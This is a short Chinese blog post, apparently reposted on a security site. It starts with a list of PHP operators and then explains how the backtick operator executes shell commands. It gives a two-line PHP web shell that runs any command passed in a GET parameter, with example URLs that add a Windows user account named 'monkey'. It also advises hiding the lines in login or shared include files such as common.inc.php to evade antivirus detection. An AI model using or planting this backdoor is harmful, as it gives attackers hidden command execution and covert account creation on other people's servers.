转载不加作者名字的木JJ。
作者:猴子 博客:www.sbmonkey.com
php内大致有这么几种运算符。
按运算符号的功能分为: 一:算术运算符(+ - * / % ++ --) 二:字符串运算符 . 可以叫连接运算符号 三:赋值运算符 = += -= *= /= %= .= 四:比较运算符 > < >= <= == === <> != !== 五:逻辑运算符 &&或and ||或or !或not 六:位运算符 & | ^ ~ << >> <<< 七:其他运算符 ? : `` @ => -> :: & $
而其中`` 在PHP中,我给它命名是系统运算符
因为包含在``内的字符串可以当做系统命令来执行,那么简单的。。
为了逃过杀软的查杀。。。。一种新型的PHP后门出来了。
<?php
$houzi = $_GET['monkey'];
echo `$houzi`;
?>
http://www.sbmonkey.com/1.php?monkey=net user monkey monkey /add
很明显的monkey变量的内容为net user monkey monkey /add。需要执行什么命令只需要monkey变量的值。
我们不必如此拘束。我们可以把他放在任意文件内
如:admin_login. asp
把这两句加入在中间增强隐蔽效果。
$houzi = $_GET['monkey'];
echo `$houzi`;
执行:
http://www.2cto.com /admin/admin_login.php?monkey=net user monkey monkey /add
以前有的人喜欢把后门放在common.inc.php内。这样,所有require 此文件的文件都可以当做后门
既然这样
那么我们完全可以在common.inc.php内使用
$GLOBALS['monkey']=" net user monkey monkey /add"
来声明一个超级全局变量,然后在其他我们想插入的文件内插入echo `$houzi`;
这样做方便,免杀效果好 需要谨慎防御
查看更多关于揭秘PHP的一种新型留后门方式 - 网站安全 - 自学的详细内容...